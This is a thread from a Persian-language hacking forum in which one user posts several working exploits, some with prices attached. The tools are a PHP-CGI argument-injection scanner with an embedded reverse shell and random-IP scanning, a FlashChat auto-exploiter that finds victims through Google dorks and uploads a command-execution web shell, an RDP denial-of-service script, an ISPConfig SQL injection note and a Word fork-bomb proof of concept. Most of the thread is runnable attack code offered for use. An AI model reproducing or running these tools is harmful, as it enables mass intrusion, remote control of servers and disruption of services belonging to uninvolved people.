    => array("pipe""r"), => array("pipe""w"),=> array("pipe""w"));
        
    $process proc_open($shell$descriptorspec$pipes);
        if (!
    is_resource($process)) {exit(1);}stream_set_blocking($pipes[1], 0);
        
    stream_set_blocking($pipes[2], 0);stream_set_blocking($sock0);
        
    printit("Successfully opened reverse shell to $ip:$port");while (1) {
        if (
    feof($sock)) {printit("ERROR: Shell connection terminated");break;}
        if (
    feof($pipes[1])) {printit("ERROR: Shell process terminated");break;}
        
    $read_a = array($sock$pipes[1], $pipes[2]);
        
    $num_changed_sockets stream_select($read_a$write_a$error_anull);
        if (
    in_array($sock$read_a)) {if ($debugprintit("SOCK READ");
        
    $input fread($sock$chunk_size);if ($debugprintit("SOCK: $input");
        
    fwrite($pipes[0], $input);}if (in_array($pipes[1], $read_a)) {
        if (
    $debugprintit("STDOUT READ");$input fread($pipes[1], $chunk_size);
        if (
    $debugprintit("STDOUT: $input");fwrite($sock$input);}
        if (
    in_array($pipes[2], $read_a)) {if ($debugprintit("STDERR READ");
        
    $input fread($pipes[2], $chunk_size);
        if (
    $debugprintit("STDERR: $input");fwrite($sock$input);}}fclose($sock);
        
    fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);
        function 
    printit ($string) {if (!$daemon) {print "$string\n";}}?>
        '''
        return c0nn_b4ck


    def enc0dez():
        n33dz1 = ('cgi-bin', 'php')
        n33dz2 = ('-d', 'allow_url_include=on', '-d', 'safe_mode=off', '-d',
                'suhosin.simulation=on', '-d', 'disable_functions=""', '-d',
                'open_basedir=none', '-d', 'auto_prepend_file=php://input',
                '-d', 'cgi.force_redirect=0', '-d', 'cgi.redirect_status_env=0',
                '-d', 'auto_prepend_file=php://input', '-n')
        fl4g = 0
        arg5 = ''
        p4th = ''
        plus = ''
     
        for x in n33dz2:
            if fl4g == 1:
                plus = '+'
            arg5 = arg5 + plus + \
                    ''.join('%' + c.encode('utf-8').encode('hex') for c in x)
            fl4g = 1
        for x in n33dz1:
            p4th = p4th + '/' + \
                    ''.join('%' + c.encode('utf-8').encode('hex') for c in x)
        return (p4th.upper(), arg5.upper())


    def m4k3_p4yl0rd(p4yl0rd, m0de):
        p4th, arg5 = enc0dez()
        if m0de == VULN:
            p4yl0rd = t3st
        elif m0de == SCMD or m0de == XPLT:
            p4yl0rd = 'POST /' + p4th + '?' + arg5 + ' HTTP/1.1\r\n' \
                    'Host: ' + sys.argv[1] + '\r\n' \
                    'Content-Type: application/x-www-form-urlencoded\r\n' \
                    'Content-Length: ' + str(len(p4yl0rd)) + '\r\n\r\n' + p4yl0rd
        return p4yl0rd


    def s3nd_sh1t(args, m0de, c0nn_b4ck):
        pat = '<b>Parse error</b>:'
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(float(args.t))
            res = s.connect_ex((args.h, int(args.p)))
            if res == 0:
                if m0de == VULN:
                    p4yl0rd = m4k3_p4yl0rd('', m0de)
                    s.sendall(p4yl0rd)
                    if pat in s.recv(4096):
                        print "--> " + args.h + " vu1n"
                        return args.h
                    else:
                        if args.v:
                            print "--> %s n0t vu1n" % (args.h)
                        return
                elif m0de == SCMD:
                    p4yl0rd = m4k3_p4yl0rd('<? system("' + args.c + '"); ?>', m0de)
                    s.sendall(p4yl0rd)
                    rd, wd, ex = select.select([s], [], [], float(args.t))
                    if rd:
                        for line in s.makefile():
                            print line,
                elif m0de == XPLT:
                    p4yl0rd = m4k3_p4yl0rd(c0nn_b4ck, m0de)
                    s.sendall(p4yl0rd)
            else:
                if args.v:
                    print "--> n0 w3bs3rv3r 0n %s" % (args.h)
        except socket.error:
            return
        return


    def m4k3_r4nd_1p4ddr(num):
        h0sts = []
        for x in range(int(num)):
            h0sts.append('%d.%d.%d.%d' % (random.randrange(0,255),
                    random.randrange(0,255), random.randrange(0,255),
                    random.randrange(0,255)))
        return h0sts


    def sc4n_r4nd0m(args, h0st, m0de, vu1nz):
        args.h = h0st
        vu1nz.append(s3nd_sh1t(args, m0de, None))
        vu1nz = filter(None, vu1nz)
        return


    def sc4n_fr0m_f1le(args, h0st, m0de, vu1nz):
        args.h = h0st.rstrip()
        vu1nz.append(s3nd_sh1t(args, m0de, None))
        vu1nz = filter(None, vu1nz)
        return


    def sc4n_r4ng3(rsa, rsb, args, m0de):
        vu1nz = []
        for i in range (rsa[0], rsb[0]):
            for j in range (rsa[1], rsb[1]):
                for k in range (rsa[2], rsb[2]):
                    for l in range(rsa[3], rsb[3]):
                        args.h = str(i) + "." + str(j) + "." + str(k) + "." + str(l)
                        vu1nz.append(s3nd_sh1t(args, m0de, None))
                        time.sleep(0.005)
        vu1nz = filter(None, vu1nz)
        return vu1nz


    def m4k3_ipv4_r4ng3(iprange):
        a = tuple(part for part in iprange.split('.'))
        rsa = (range(4))
        rsb = (range(4))
        for i in range(0,4):
            ga = a[i].find('-')
            if ga != -1:
                rsa[i] = int(a[i][:ga])
                rsb[i] = int(a[i][1+ga:]) + 1                                        
            else:
                rsa[i] = int(a[i])
                rsb[i] = int(a[i]) + 1
        return (rsa, rsb)


    def parse_args():
        p = argparse.ArgumentParser(
        usage='\n\n  ./ap-unlock-v2.py -h <4rg> -s | -c <4rg> | -x <4rg> [0pt1ons]'\
                '\n  ./ap-unlock-v2.py -r <4rg> | -R <4rg> | -i <4rg> [0pt1ons]',
        formatter_class=argparse.RawDescriptionHelpFormatter, add_help=False)
        opts = p.add_argument_group('0pt1ons', '')
        opts.add_argument('-h', metavar='wh1t3h4tz.0rg',
                help='| t3st s1ngle h0st f0r vu1n')
        opts.add_argument('-p', default=80, metavar='80',
                help='| t4rg3t p0rt (d3fau1t: 80)')
        opts.add_argument('-c', metavar='\'uname -a;id\'',
                help='| s3nd c0mm4nds t0 h0st')
        opts.add_argument('-x', metavar='192.168.0.2:1337',
                help='| c0nn3ct b4ck h0st 4nd p0rt f0r sh3ll')
        opts.add_argument('-s', action='store_true',
                help='| t3st s1ngl3 h0st f0r vu1n')
        opts.add_argument('-r', metavar='133.1.3-7.7-37',
                help='| sc4nz iP addr3ss r4ng3 f0r vu1n')
        opts.add_argument('-R', metavar='1337',
                help='| sc4nz num r4nd0m h0st5 f0r vu1n')
        opts.add_argument('-t', default=3, metavar='3',
                help='| t1me0ut in s3x (d3fau1t: 3)')
        opts.add_argument('-f', metavar='vu1n.lst',
                help='| wr1t3 vu1n h0sts t0 f1l3')
        opts.add_argument('-i', metavar='sc4nz.lst',
                help='| sc4nz h0sts fr0m f1le f0r vu1n')
        opts.add_argument('-S', metavar='2',
                help='| sl33pz in s3x b3tw33n thr3adz (d3fault: 2)')
        opts.add_argument('-T', default=2, metavar='4',
                help='| nuM sc4n thr3adz (d3fault: 4)')
        opts.add_argument('-v', action='store_true',
                help='| pr1nt m0ah 1nf0z wh1l3 sh1tt1ng')
        args = p.parse_args()
        if not args.h and not args.r and not args.R and not args.i:
            p.print_help()
            sys.exit(0)
        return args


    def wr1te_fil3(args, vu1nz):
        if args.f:
            if vu1nz:
                try:
                    f = open(args.f, "w")
                    f.write("\n".join(vu1nz)+"\n")
                    f.close()
                except:
                    sys.stderr.write('de1n3 mudd1 k0cht guT')
                    sys.stderr.write('\n')
                    raise SystemExit()
        return


    def c0ntr0ller():
        vu1nz = []
        m0de = NONE
        try:
            args = parse_args()
            if not args.t:
                args.t = float(3)
            if args.h:
                if args.s:
                    print "[+] sc4nn1ng s1ngl3 h0st %s " % (args.h)
                    m0de = VULN
                    s3nd_sh1t(args, m0de, None)
                elif args.c:
                    print "[+] s3nd1ng c0mm4ndz t0 h0st %s " % (args.h)
                    m0de = SCMD
                    s3nd_sh1t(args, m0de, None)
                elif args.x:
                    print "[+] xpl0it1ng b0x %s " % (args.h)
                    m0de = XPLT
                    if args.x.find(':') != -1:
                        if not args.x.split(':')[1]:
                            print "[-] 3rr0r: p0rt m1ss1ng"
                        else:
                            cb_h0st = args.x.split(':')[0]
                            cb_p0rt = args.x.split(':')[1]
                    else:
                        print "[-] 3rr0r: <h0st>:<p0rt> y0u l4m3r"
                    c0nn_b4ck = m4ke_c0nn_b4ck_sh1t(cb_h0st, cb_p0rt)
                    s3nd_sh1t(args, m0de, c0nn_b4ck)
                else:
                    print "[-] 3rr0r: m1ss1ng -s, -c 0r -x b1tch"
                    sys.exit(-1)
            if args.r:
                print "[+] sc4nn1ng r4ng3 %s " % (args.r)
                m0de = VULN
                rsa, rsb = m4k3_ipv4_r4ng3(args.r)
                vu1nz = sc4n_r4ng3(rsa, rsb, args, m0de)
            if args.R:
                print "[+] sc4nn1ng %d r4nd0m b0xes" % (int(args.R))
                m0de = VULN
                if not args.S:
                    args.S = float(2)
                h0sts = m4k3_r4nd_1p4ddr(int(args.R))
                for h0st in h0sts:
                    try:
                        t = threading.Thread(target=sc4n_r4nd0m, args=(args, h0st,
                            m0de, vu1nz))
                        t.start()
                        time.sleep(float(args.S))
                        while threading.activeCount() > int(args.T):
                            time.sleep(2)
                    except:
                        sys.stdout.flush()
                        sys.stdout.write("\b\b[!] w4rn1ng: ab0rt3d bY us3r\n")
                        raise SystemExit
            if args.i:
                print "[+] sc4nn1ng b0xes fr0m f1le %s" % (args.i)
                m0de = VULN
                h0sts = tuple(open(args.i, 'r'))
                if not args.S:
                    args.S = float(2)
                for h0st in h0sts:
                    try:
                        t = threading.Thread(target=sc4n_fr0m_f1le, args=(args,
                            h0st, m0de, vu1nz))
                        t.start()
                        time.sleep(float(args.S))
                        while threading.activeCount() > int(args.T):
                            time.sleep(2)
                    except KeyboardInterrupt:
                        sys.stdout.flush()
                        sys.stdout.write("\b\b[!] w4rn1ng: ab0rt3d bY us3r\n")
                        raise SystemExit
                #sc4n_fr0m_f1le(args, h0sts, m0de, vu1nz)
        except KeyboardInterrupt:
            sys.stdout.flush()
            sys.stderr.write("\b\b[!] w4rn1ng: ab0rt3d bY us3r\n")
            raise SystemExit
        wr1te_fil3(args, vu1nz)

        return


    def m41n():
        if  __name__ == "__main__":
            print "--==[ ap-unlock-v2.py by [email protected] ]==--"
            c0ntr0ller()
        else:
            print "[-] 3rr0r: y0u fuck3d up dud3"
            sys.exit(1)
        print "[+] h0p3 1t h3lp3d"


    # \o/ fr33 requiem 1337 h4x0rs ... 
    m41n()

    # e0F
     
  9. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    من اینارو خیلی وقت پیش داشتم و حقیقتش یادم نمیومد از کجا گرفته بودم.و نمیدونستم پابلیک شده معذرت میخوام.ولی خب من باز هرچی دارم میذارم باز ممکنه کسی نداشته باشه.خب از اونجایی که پابلیک شده دوستان خواستند میتونند در فروم های دیگه قرار بدند و بیشتر از این پابلیک کنند D: .

    ISPConfig 3.0.5. 6 SQL injection Vulnerability

    50$

    PHP:
    In file interface/lib/classes/listform.inc.php on line 155:

    $_SESSION['search'][$list_name][$search_prefix.$field] = $_REQUEST[$search_prefix.$field];

    and 
    below on line 184:

    $sql_where .= $field ".$i['op']." '".$i['prefix'].$_SESSION['search'][$list_name][$search_prefix.$field].$i['suffix']."' and";

    without input sanitization may causes function getSearchSQL() returning injected sql WHERE substring!

    I put simple workaround under line 155:

    if(
    preg_match("/['\\\\]/"$_SESSION['search'][$list_name][$search_prefix.$field]))
    $_SESSION['search'][$list_name][$search_prefix.$field] = '';
     
  10. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    Word 2003 SP2 .doc fork bomb on WinXP SP3

    Word 2003 SP2 .doc fork bomb on WinXP SP3

    150$

    PHP:
    # Exploit Title: Word 2003 SP2 .doc fork bomb on WinXP SP3
    # Exploit Author: absane
    # Blog: http://blog.noobroot.com
    # Discovery date: November 8th 2003
    # Vendor Homepage: http://www.microsoft.com
    # Tested on: Windows XP SP3 & Word 2003 SP2 (11.6568.6568)

    ******************
    Vulnerability *
    ******************
    A malformed .doc file with an embedded image causes a fork bomb in Word 2003 SP2 on Windows XP SP3 by
    comsuming 99
    % - 100of the CPU cycles which can only be ended by teminating the process.

    ******************
    *
    Proof of Concept*
    ******************
    http://www.noobroot.com/exploits/word2003forkbomb.doc

    ******************
    Mitigation *
    ******************
    The vulnerability does not appear to affect Office 2010+ and any other versions of Windows.
    Upgrade to Windows 7 or higher and/or upgrade to Office 2010 or higher
     
  11. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    FlashChat Auto Exploiter

    FlashChat Auto Exploiter

    فایل اول : Flashchat.php

    PHP:
    <?php
    set_time_limit
    (0);
    ini_set('memory_limit''64M');
    header('Content-Type: text/html; charset=UTF-8');
    function 
    letItBy(){ ob_flush(); flush(); }
    function 
    getAlexa($url)
    {
        
    $xml simplexml_load_file('http://data.alexa.com/data?cli=10&dat=snbamz&url='.$url);
        
    $rank1 $xml->SD[1];
        if(
    $rank1)
            
    $rank $rank1->POPULARITY->attributes()->TEXT;
        else
            
    $rank 0;
        return 
    $rank;
    }
        
    function 
    google_that($query$page=1)
    {
        
    $resultPerPage=8;
        
    $start $page*$resultPerPage;
        
    $url "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" urlencode($query);
        
    $resultFromGoogle json_decodehttp_get($urltrue) ,true);
        if(isset(
    $resultFromGoogle['responseStatus'])) {
            if(
    $resultFromGoogle['responseStatus'] != '200') return false;
            if(
    sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
            else return 
    $resultFromGoogle['responseData']['results'];
        }
        else
            die(
    'The function <b>' __FUNCTION__ '</b> Kill me :( <br>' $url );
    }
        
    function 
    http_get($url$safemode false){
        if(
    $safemode === truesleep(1);
        
    $im curl_init($url);
        
    curl_setopt($imCURLOPT_RETURNTRANSFER1);
        
    curl_setopt($imCURLOPT_CONNECTTIMEOUT10);
        
    curl_setopt($imCURLOPT_FOLLOWLOCATION1);
        
    curl_setopt($imCURLOPT_HEADER0);
        return 
    curl_exec($im);
        
    curl_close();
    }

    function 
    check_vuln($url) {
    $shell dirname($url) . '/temp/g00n.php';
    $url dirname($url) . '/upload.php';
    $postFields = array();
    $filePath "D:\\xampp\\htdocs\\g00n.php";
    $postFields['file'] = "@$filePath";
    $curl_handle curl_init();
    curl_setopt($curl_handleCURLOPT_URL$url);
    curl_setopt($curl_handleCURLOPT_RETURNTRANSFERtrue);
    curl_setopt($curl_handleCURLOPT_POSTtrue);
    curl_setopt($curl_handleCURLOPT_POSTFIELDS$postFields);
    $result curl_exec($curl_handle);
    curl_close($curl_handle);
    if(
    strpos($result,"@g00n.php") != false)
        return 
    $shell;
    else
        return 
    "Fail!";
    }
    ?>

    <html>
    <head>
        <meta name="Content-Type" content="text/html; charset=UTF-8">
        <title>FlashChat Arbitrary File Upload - by g00n</title>
        <style type="text/css">
            body{ background-color:#000000; font: normal 14px Verdana; color:#ffffff;}
            input{ border-width:0px; padding:2px; width:250px; }
            a{ text-decoration:underline; color:#ffffff;}
            #button{ width:50px;}
            #result{margin:10px;}
            #result span{display:block;}
            #result .Y{background-color:green;}
            #result .X{background-color:red;}
        </style>
    </head>
    <body>
    <center>
    <br />
    <h1><font color="green">FlashChat Scanner</font></h1>
    [For FlashChat Arbitrary File Upload Vuln]<br /><font size="1">Note: the bug was found by somebody else</font><br /><br /><br />
        <form method="post">
            Google Dork:
            <input type="text" id="dork" name="dork" value="<?php echo (isset($_POST['dork']{0})) ? htmlentities($_POST['dork']) : 'intitle:FlashChat v6'?>" />
            <input type="submit" value="Start" id="button"/>
        </form>
    <?php
        
    if(isset($_POST['dork']{0})) {
            
    $file fopen("g00nShellz.txt","a");
            echo 
    '<br /><div id="result"><b>Scanning has been started... Good luck! ;)</b><br><br>';            
            
    letItBy();            
            for(
    $googlePage 1$googlePage <= 50$googlePage++) {
                
    $googleResult google_that($_POST['dork'], $googlePage);
                if(!
    $googleResult) {
                    echo 
    'Finished scanning.';
                    
    fclose($file);
                    break;
                }
                
                for(
    $victim 0$victim sizeof($googleResult); $victim++){
                    
    $result check_vuln($googleResult[$victim]['unescapedUrl']);
                    
    $alexa getAlexa($googleResult[$victim]['unescapedUrl']);
                    echo 
    "Currently checking...";
                    if(
    $result != "Fail!"){
                        
    $line $result " | " $alexa "\n";
                        
    fwrite($file,$line);
                        echo 
    '<span class="Y">';
                        echo 
    "SITE: <a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult[$victim]['unescapedUrl']}</a> - <b>VULNERABLE</b>\n";
                        echo 
    "<br /><a href=\"$result\" target=\"_blank\"><b>OPEN SHELL</b></a>";
                        echo 
    " - Alexa Rank = <b>" $alexa "</b></span><br />";
                    }
                    else {
                    echo 
    '<span class="X">';
                    echo 
    "<a href=\"{$googleResult[$victim]['unescapedUrl']}\" target='_blank'>{$googleResult[$victim]['titleNoFormatting']}</a> - NOT VULNERABLE";
                    if(
    $alexa <= 50000)
                        echo 
    " - " $alexa;
                    echo 
    "</span>\n<br />";
                    }
                    
    letItBy();
                }
            }
            echo 
    '</div>';
        }
    ?>
    <br /><br />
    <font color="red" face="verdana" size="1"><b>Coded by g00n.<br />Greets: Xploiter.net</b></font>
    </center>
    </body>
    </html>
    فایل دوم : g00n.php
    PHP:
     <?php
    echo "<h3>Works! Usage: g00n.php?g00n=[CMD]</h3>";
    echo 
    "<pre>";
    $cmd = isset($_GET['g00n'])?$_GET['g00n']:"whoami";
    echo 
    passthru($cmd);
    echo 
    "</pre>";
    echo 
    "<br />g00n - Xploiter.net";
    ?> 
     
  12. WH!T3 W01F
    مدیر بازنشسته

    وضعیت:
    Offline
    تاریخ عضویت:
    ‏7/12/14
    ارسال ها:
    311
    تشکر شده:
    535
    جنسیت:
    محل سکونت:
    usr/bin/perl/!#
    Name:
    WH!T3_W01F
    Main os:
    Windows
    Remote Desk Top denial of service vulnerability (perl & python)

    Remote Desk Top denial of service vulnerability (perl & python)

    PHP:
    Remote Desk Top denial of service vulnerability (perl python)
    ---------------------------------------------------------------

    Full title Remote Desk Top denial of service vulnerability (perl python)
    Date add 2013-07-15
    Category remote exploits
    Platform windows
    Vendor http
    ://msdn.microsoft.com/en-us/library/windows/desktop/aa383015%28v=vs.85%29.aspx
    Tested on Windows 7 Windows SP3 SP2 ]
    Tags dos,rdp,perl,python
    Prog lang
    Perl



    #!/usr/bin/perl
            
    use strict;
            use 
    Socket;
            use 
    HTTP::Request;
            use 
    LWP::UserAgent;
            use 
    warnings;   
        
    system("title The Black Devils");
        
    system("color 1e");
        
    system ("cls");
        print 
    "    |=========================================================================|\n";
        print 
    "    |= [!] Name :   Microsoft Remote Desktop  Use-After-Free DoS    =|\n";
        print 
    "    |= [!] Author  : The Black Devils                                        =|\n";
        print 
    "    |= [!] Mail: mr.k4rizma(at)gmail(dot)com                                 =|\n";
        print 
    "    |=========================================================================|\n";
        
            print 
    "\n\n";
            print 
    "\t\t\tWelcom To AK-Remote Fuzzer\n\n";
            print 
    "\t Insert Target (ex: 192.168.1.1)\n";
            
    my $host = <> ;
            print 
    "\t Target is  : $host ";
    my $maxchannelids "\x02\x01\xff" ;
    my $junk ="\x03\x00\x00\x13".
    "\x0E\xE0\x00\x00".
    "\x00\x00\x00\x01".
    "\x00\x08\x00\x00".
    "\x00\x00\x00".
    "\x03\x00\x00\x6A".
    "\x02\xF0\x80".
    "\x7F\x65\x82\x00".
    "\x5E".
    "\x04\x01\x01"
    "\x04\x01\x01".
    "\x01\x01\xFF".  
    "\x30\x19".                      
    $maxchannelids.   
    "\x02\x01\xFF".    
    "\x02\x01\x00".    
    "\x02\x01\x01".   
    "\x02\x01\x00".    
    "\x02\x01\x01".   
    "\x02\x02\x00\x7C".  
    "\x02\x01\x02".
    "\x30\x19".    
    $maxchannelids.   
    "\x02\x01\xFF".     
    "\x02\x01\x00".    
    "\x02\x01\x01".      
    "\x02\x01\x00".   
    "\x02\x01\x01".      
    "\x02\x02\x00\x7C".
    "\x02\x01\x02".      
    "\x30\x19".                    
    $maxchannelids.  
    "\x02\x01\xFF".   
    "\x02\x01\x00".      
    "\x02\x01\x01".   
    "\x02\x01\x00".                             
    "\x02\x01\x01".   
    "\x02\x02\x00\x7C".                        
    "\x02\x01\x02".   
    "\x04\x82\x00\x00".                         
    "\x03\x00\x00\x08".
    "\x02\xF0\x80".                             
    "\x28".          
    "\x03\x00\x00\x08".
    "\x02\xF0\x80".   
    "\x28".                                     
    "\x03\x00\x00\x08".
    "\x02\xF0\x80".                              
    "\x28".           
    "\x03\x00\x00\x08".  
    "\x02\xF0\x80".   
    "\x28".              
    "\x03\x00\x00\x08".
    "\x02\xF0\x80".    
    "\x28".           
    "\x03\x00\x00\x08".  
    "\x02\xF0\x80".   
    "\x28".              
    "\x03\x00\x00\x08".
    "\x02\xF0\x80".     
    "\x28".           
    "\x03\x00\x00\x08".  
    "\x02\xF0\x80".   
    "\x28".              
    "\x03\x00\x00\x0C".
    "\x02\xF0\x80".      
    "\x38\x00\x06\x03".
    "\xF0".            
    "\x03\x00\x00\x09".
    "\x02\xF0\x80".      
    "\x21\x80".
    "\x03\x00\x00\x13".
    "\x0E\xE0\x00\x00".
    "\x00\x00\x00\x01".
    "\x00\x08\x00\x00".
    "\x00\x00\x00".
    "\x03\x00\x00\x6A".
    "\x02\xF0\x80".
    "\x7F\x65\x82\x00".
    "\x5E".
    "\x04\x01\x01"
    "\x04\x01\x01".
    "\x01\x01\xFF".  
    "\x30\x19".                      
    $maxchannelids.   
    "\x02\x01\xFF".    
    "\x02\x01\x00".    
    "\x02\x01\x01".   
    "\x02\x01\x00".    
    "\x02\x01\x01".   
    "\x02\x02\x00\x7C".  
    "\x02\x01\x02".
    "\x30\x19".    
    $maxchannelids.   
    "\x02\x01\xFF".     
    "\x02\x01\x00".    
    "\x02\x01\x01".      
    "\x02\x01\x00".   
    "\x02\x01\x01".      
    "\x02\x02\x00\x7C".
    "\x02\x01\x02".      
    "\x30\x19".                    
    $maxchannelids.  
    "\x02\x01\xFF".   
    "\x02\x01\x00".      
    "\x02\x01\x01".   
    "\x02\x01\x00".                             
    "\x02\x01\x01".   
    "\x02\x02\x00\x7C".                        
    "\x02\x01\x02".   
    "\x04\x82\x00\x00".                         
    "\x03\x00\x00\x08".
    "\x02\xF0\x80".                             
    "\x28".          
    "\x03\x00\x00\x08".
    "\x02\xF0\x80".   
    "\x28".                                     
    "\x03\x00\x00\x08".
    "\x02\xF0\x80".                              
    "\x28".           
    "\x03\x00\x00\x08".  
    "\x02\xF0\x80".   
    "\x28".              
    "\x03\x00\x00\x08".
    "\x02\xF0\x80".    
    "\x28".           
    "\x03\x00\x00\x08".  
    "\x02\xF0\x80".   
    "\x28".              
    "\x03\x00\x00\x08".
    "\x02\xF0\x80".     
    "\x28".           
    "\x03\x00\x00\x08".  
    "\x02\xF0\x80".   
    "\x28".              
    "\x03\x00\x00\x0C".
    "\x02\xF0\x80".      
    "\x38\x00\x06\x03".
    "\xF0".            
    "\x03\x00\x00\x09".
    "\x02\xF0\x80".      
    "\x21\x80" ;          
    # initialize  port

    my $port 3389 ;
    my $proto getprotobyname('tcp');
    # get the port address
    my $iaddr inet_aton($host);
    my $paddr sockaddr_in($port$iaddr);

    print 
    "[+] Setting up socket\n";
    # create the socket, connect to the port
    socket(SOCKETPF_INETSOCK_STREAM$proto) or die "socket: $!";
    print 
    "[+] Connecting to $host on port $port\n";
    connectSOCKET$paddr) or die "connect: $!";

    print 
    "[+] Sending Buffer\n";
    print 
    SOCKET $junk."\n";
    print 
    "[+] Buffer sent\n";
    close SOCKET or die goto menu;
     
بارگذاری...
مطالب مشابه
  1. sajjadsotoudeh
    پاسخ ها:
    1
    دانلودها:
    960
  2. Sir.h4m1D
    پاسخ ها:
    0
    دانلودها:
    393
  3. Mkali07
    پاسخ ها:
    1
    دانلودها:
    929
  4. JOK3R
    پاسخ ها:
    0
    دانلودها:
    1,186
  5. MR.SHDOVV
    پاسخ ها:
    5
    دانلودها:
    1,252
به انجمن تخصصی امنیت ایران سایبر خوش آمدید . برای مشاهده تمامی تالار ها و امکانات ثبت نام کنید .